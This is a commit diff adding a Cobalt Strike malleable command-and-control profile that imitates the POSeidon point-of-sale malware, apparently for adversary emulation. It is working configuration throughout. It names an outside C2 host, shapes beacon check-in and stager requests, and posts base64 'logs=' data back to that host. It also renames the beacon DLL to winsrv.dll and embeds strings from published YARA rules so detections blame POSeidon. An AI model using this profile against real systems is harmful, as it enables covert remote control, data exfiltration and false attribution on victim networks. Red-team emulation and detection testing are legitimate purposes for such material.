Create POSeidon.profile

crimeware/POSeidon.profile

@@ -0,0 +1,154 @@
+#POSeidon
+#taken from --> https://vallejo.cc/2017/07/12/analysis-of-poseidon-downloader-and-keylogger/
+#xx0hcd
+
+
+set sleeptime "30000";
+set jitter    "20";
+set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; Media Center PC 6.0)";
+set dns_idle "8.8.8.8";
+set maxdns    "235";
+
+
+http-get {
+
+    set uri "/Baked/viewtopic.php";
+    
+    client {
+
+        header "Accept" "*/*";
+	header "Content-Type" "application/x-www-form-urlencoded";
+	header "Host" "retjohnuithun.com";
+	header "Cache-Control" "no-cache";	
+        
+        metadata {
+            netbios;
+	    prepend "PHPSESSID=";
+            header "Cookie";
+
+
+        }
+
+
+    }
+
+    server {
+
+        header "Server" "nginx/1.10.2";
+	header "Content-Type" "text/html";
+	header "Connection" "keep-alive";
+	header "X-Powered-By" "PHP/5.4.38";
+        
+
+        output {
+            netbios;
+            print;
+        }
+    }
+}
+
+http-post {
+    
+    set uri "/baked/viewtopic.php";
+
+    client {
+       
+	header "Accept" "*/*";
+	header "Content-Type" "application/x-www-form-urlencoded";
+	header "Host" "retjohnuithun.com";
+#	header "Cache-Control" "no-cache";
+        
+        output {
+            base64;
+	    prepend "logs=";
+	    prepend "vers=13.4&";
+	    prepend "win=6&";
+	    prepend "uinfo=dWluZm8=&";
+	    prepend "uid=692207&";
+	    prepend "oprat=2&";	    
+	    print;
+
+        }
+        
+  	     
+        id {
+            base64url;
+#	    prepend "PHPSESSID=";
+	    header "Cookie";
+
+        }
+    }
+
+    server {
+
+	header "Server" "nginx/1.10.2";
+	header "Content-Type" "text/html";
+	header "Connection" "keep-alive";
+	header "X-Powered-By" "PHP/5.4.38";
+        
+
+        output {
+            netbios;
+            print;
+        }
+    }
+}
+
+http-stager {
+
+	set uri_x86 "/ldl01/viewtopic.php";
+	set uri_x64 "/Ldl01/viewtopic.php";
+
+    client {
+	header "Accept" "*/*";
+	header "Content-Type" "application/x-www-form-urlencoded";
+	header "Host" "retjohnuithun.com";
+	header "Cache-Control" "no-cache";
+    }
+
+    server {
+        header "Server" "nginx/1.10.2";
+	header "Content-Type" "text/html";
+	header "Connection" "keep-alive";
+	header "X-Powered-By" "PHP/5.4.38";
+    
+    }
+
+
+}
+
+stage {
+	#random
+	set compile_time "15 Nov 2017 12:24:14";
+	set image_size_x86 "301000";
+
+	transform-x86 {
+		strrep "beacon.dll" "winsrv.dll";
+	}
+
+	transform-x64 {
+		strrep "beacon.x64.dll" "winsrv.dll";
+	}	
+
+	#yara rules from --> http://vkremez.weebly.com/cyber-intel/january-18th-2016
+	stringw "timed out";
+        stringw "AR6002";
+        stringw " delete[]";
+        stringw "horticartf.com";
+        stringw "CreateSemaphoreExW";
+        stringw "sma-se";
+        stringw "smj-NO";
+        stringw "IsValidLocaleName";
+        stringw "oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s";
+        stringw "bad exception";
+        stringw "_nextafter";
+        stringw "omni callsig'";
+        stringw "6d6h6l6p6t6x6";
+        stringw "DOMAIN error";
+        stringw "vector copy constructor iterator'";
+        stringw "- inconsistent onexit begin-end variables";
+        stringw "Monday";
+        stringw "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) x";
+        stringw "horticartf.com";
+
+}